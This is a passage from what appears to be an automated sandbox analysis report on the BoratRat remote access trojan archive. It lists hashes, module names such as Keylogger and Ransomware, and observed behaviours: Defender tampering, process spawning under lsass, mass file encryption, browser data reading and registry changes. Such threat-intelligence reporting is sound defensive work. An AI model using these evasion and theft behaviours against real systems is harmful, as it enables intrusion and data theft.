Overview
overview
10Static
static
10Borat.rar
windows11-21h2-x64
10Borat/BoratRat.exe
windows11-21h2-x64
10Borat/bin/Audio.dll
windows11-21h2-x64
1Borat/bin/Discord.dll
windows11-21h2-x64
1Borat/bin/Extra.dll
windows11-21h2-x64
1Borat/bin/...er.dll
windows11-21h2-x64
1Borat/bin/...er.dll
windows11-21h2-x64
1Borat/bin/Fun.dll
windows11-21h2-x64
1Borat/bin/...on.dll
windows11-21h2-x64
1Borat/bin/...er.exe
windows11-21h2-x64
1Borat/bin/Logger.dll
windows11-21h2-x64
1Borat/bin/...ib.dll
windows11-21h2-x64
1Borat/bin/...us.dll
windows11-21h2-x64
1Borat/bin/Netstat.dll
windows11-21h2-x64
1Borat/bin/Options.dll
windows11-21h2-x64
1Borat/bin/...er.dll
windows11-21h2-x64
1Borat/bin/...re.dll
windows11-21h2-x64
1Borat/bin/...ry.dll
windows11-21h2-x64
1Borat/bin/Regedit.dll
windows11-21h2-x64
1Borat/bin/...ra.dll
windows11-21h2-x64
1Borat/bin/...op.dll
windows11-21h2-x64
1Borat/bin/...xy.dll
windows11-21h2-x64
1Borat/bin/...le.dll
windows11-21h2-x64
1Borat/bin/...ry.dll
windows11-21h2-x64
1Borat/bin/...ion.db
windows11-21h2-x64
3Borat/raw/Client.exe
windows11-21h2-x64
1Analysis
-
max time kernel
830s -
max time network
489s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-06-2024 18:40
Behavioral task
behavioral1
Sample
Borat.rar
Resource
win11-20240611-en
Behavioral task
behavioral2
Sample
Borat/BoratRat.exe
Resource
win11-20240611-en
Behavioral task
behavioral3
Sample
Borat/bin/Audio.dll
Resource
win11-20240611-en
Behavioral task
behavioral4
Sample
Borat/bin/Discord.dll
Resource
win11-20240611-en
Behavioral task
behavioral5
Sample
Borat/bin/Extra.dll
Resource
win11-20240508-en
Behavioral task
behavioral6
Sample
Borat/bin/FileManager.dll
Resource
win11-20240419-en
Behavioral task
behavioral7
Sample
Borat/bin/FileSearcher.dll
Resource
win11-20240508-en
Behavioral task
behavioral8
Sample
Borat/bin/Fun.dll
Resource
win11-20240508-en
Behavioral task
behavioral9
Sample
Borat/bin/Information.dll
Resource
win11-20240611-en
Behavioral task
behavioral10
Sample
Borat/bin/Keylogger.exe
Resource
win11-20240611-en
Behavioral task
behavioral11
Sample
Borat/bin/Logger.dll
Resource
win11-20240611-en
Behavioral task
behavioral12
Sample
Borat/bin/MessagePackLib.dll
Resource
win11-20240508-en
Behavioral task
behavioral13
Sample
Borat/bin/Miscellaneous.dll
Resource
win11-20240508-en
Behavioral task
behavioral14
Sample
Borat/bin/Netstat.dll
Resource
win11-20240611-en
Behavioral task
behavioral15
Sample
Borat/bin/Options.dll
Resource
win11-20240508-en
Behavioral task
behavioral16
Sample
Borat/bin/ProcessManager.dll
Resource
win11-20240611-en
Behavioral task
behavioral17
Sample
Borat/bin/Ransomware.dll
Resource
win11-20240508-en
Behavioral task
behavioral18
Sample
Borat/bin/Recovery.dll
Resource
win11-20240611-en
Behavioral task
behavioral19
Sample
Borat/bin/Regedit.dll
Resource
win11-20240611-en
Behavioral task
behavioral20
Sample
Borat/bin/RemoteCamera.dll
Resource
win11-20240508-en
Behavioral task
behavioral21
Sample
Borat/bin/RemoteDesktop.dll
Resource
win11-20240508-en
Behavioral task
behavioral22
Sample
Borat/bin/ReverseProxy.dll
Resource
win11-20240611-en
Behavioral task
behavioral23
Sample
Borat/bin/SendFile.dll
Resource
win11-20240611-en
Behavioral task
behavioral24
Sample
Borat/bin/SendMemory.dll
Resource
win11-20240508-en
Behavioral task
behavioral25
Sample
Borat/bin/ip2region.db
Resource
win11-20240508-en
Behavioral task
behavioral26
Sample
Borat/raw/Client.exe
Resource
win11-20240508-en
General
-
Target
Borat.rar
-
Size
9.6MB
-
MD5
e3b10d235c365ac49d6855df0432bb76
-
SHA1
4ce182c19796cf8d4c017fdd8fd4b390de1eac7e
-
SHA256
53cdc49c7fb83b419c07edb45c544b106aaa37db00e8a37211678af6350a82f1
-
SHA512
bb91a4bf979516c2a19733772b4c34b09b45efbcec491f2fb62adde9222e6306ce32a17de3e6f9b3d7338a93f3d72e4747a23157675663f00e9f153bc4ec4704
-
SSDEEP
196608:XrmtNiLocMQin2MKY9U6Qw9w/ZpX4ff5c4lgg0:7mt5tn2y9Woff5c4G
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4804 created 688 4804 powershell.exe lsass.exe -
Renames multiple (7080) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Executes dropped EXE 4 IoCs
Processes:
BoratRat.exeClient.exeClient.exeDECRYPT.exepid process 3008 BoratRat.exe 1220 Client.exe 3592 Client.exe 1864 DECRYPT.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
unregmp2.exedescription ioc process File opened (read-only) \??\J: unregmp2.exe File opened (read-only) \??\N: unregmp2.exe File opened (read-only) \??\P: unregmp2.exe File opened (read-only) \??\Q: unregmp2.exe File opened (read-only) \??\O: unregmp2.exe File opened (read-only) \??\T: unregmp2.exe File opened (read-only) \??\B: unregmp2.exe File opened (read-only) \??\E: unregmp2.exe File opened (read-only) \??\G: unregmp2.exe File opened (read-only) \??\H: unregmp2.exe File opened (read-only) \??\K: unregmp2.exe File opened (read-only) \??\M: unregmp2.exe File opened (read-only) \??\W: unregmp2.exe File opened (read-only) \??\Y: unregmp2.exe File opened (read-only) \??\S: unregmp2.exe File opened (read-only) \??\X: unregmp2.exe File opened (read-only) \??\Z: unregmp2.exe File opened (read-only) \??\A: unregmp2.exe File opened (read-only) \??\I: unregmp2.exe File opened (read-only) \??\L: unregmp2.exe File opened (read-only) \??\R: unregmp2.exe File opened (read-only) \??\U: unregmp2.exe File opened (read-only) \??\V: unregmp2.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Client.exeClient.exedescription ioc process File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe Client.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\System.ServiceModel.Http.dll Client.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-36.png Client.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml Client.exe File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-48_altform-unplated_contrast-black.png Client.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\EmptyView.scale-400.png Client.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\UIAutomationClientSideProviders.resources.dll Client.exe File created C:\Program Files\WindowsApps\Microsoft.Todos_0.33.33351.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-200.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreStoreLogo.scale-100.png Client.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-processthreads-l1-1-0.dll Client.exe File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-20_altform-unplated_contrast-white.png Client.exe File created C:\Program Files (x86)\Common Files\System\msadc\msdaremr.dll Client.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyCalendarSearch.scale-125.png Client.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Runtime.Numerics.dll Client.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru\WindowsFormsIntegration.resources.dll Client.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\mecontrol.png Client.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeComRegisterShellARM64.exe Client.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\UIAutomationTypes.dll Client.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft.NET\ADOMD.NET\130\Microsoft.AnalysisServices.AdomdClient.dll Client.exe File created C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\GetHelpAppList.targetsize-80.png Client.exe File created C:\Program Files\Common Files\System\Ole DB\sqloledb.dll Client.exe File created C:\Program Files\Internet Explorer\images\bing.ico Client.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\librist_plugin.dll Client.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.InteropServices.RuntimeInformation.dll Client.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_x64__8wekyb3d8bbwe\Assets\Icons\StickyNotesAppList.targetsize-24_altform-lightunplated_contrast-black.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-100_contrast-white.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml Client.exe File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Lumia.VideoTk.dll Client.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\Microsoft.VisualBasic.Forms.resources.dll Client.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] Client.exe File created C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_neutral_split.scale-100_8wekyb3d8bbwe\Images\PowerAutomateSquare310x310Logo.scale-100.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.targetsize-60_altform-unplated_contrast-black.png Client.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo Client.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libsmb_plugin.dll Client.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\CameraAppList.targetsize-32_altform-unplated.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-black\CameraAppList.targetsize-16.png Client.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java.exe Client.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll Client.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png Client.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md Client.exe File created C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PaintSmallTile.scale-200.png Client.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarLargeTile.scale-200.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.50.24002.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml Client.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo Client.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libddummy_plugin.dll Client.exe File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\SnipSketchAppList.scale-100.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-white\CameraAppList.targetsize-60_altform-unplated.png Client.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-100.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-48_altform-lightunplated_contrast-black.png Client.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Models.dll Client.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\TIME.XML Client.exe File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-80_altform-unplated.png Client.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-64_altform-lightunplated.png Client.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\en\Microsoft.PackageManagement.MetaProvider.PowerShell.resources.dll Client.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-140.png Client.exe File created C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\el-GR\PAD.Console.Host.resources.dll Client.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-36.png Client.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\Theme_Photo_AutumnLeaves_Thumbnail.jpg Client.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_contrast-white.png Client.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons2x.png Client.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe Client.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DBGHELP.DLL Client.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Shared.v11.1.dll Client.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Illustrations\errorIllustration.scale-125.png Client.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exepid process 1448 sc.exe 1876 sc.exe 4272 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exemsinfo32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs msinfo32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID msinfo32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 msinfo32.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
msedge.exemsinfo32.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msinfo32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease msinfo32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msinfo32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Processes:
iexplore.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "2569272612" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31115911" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" iexplore.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry class 64 IoCs
Processes:
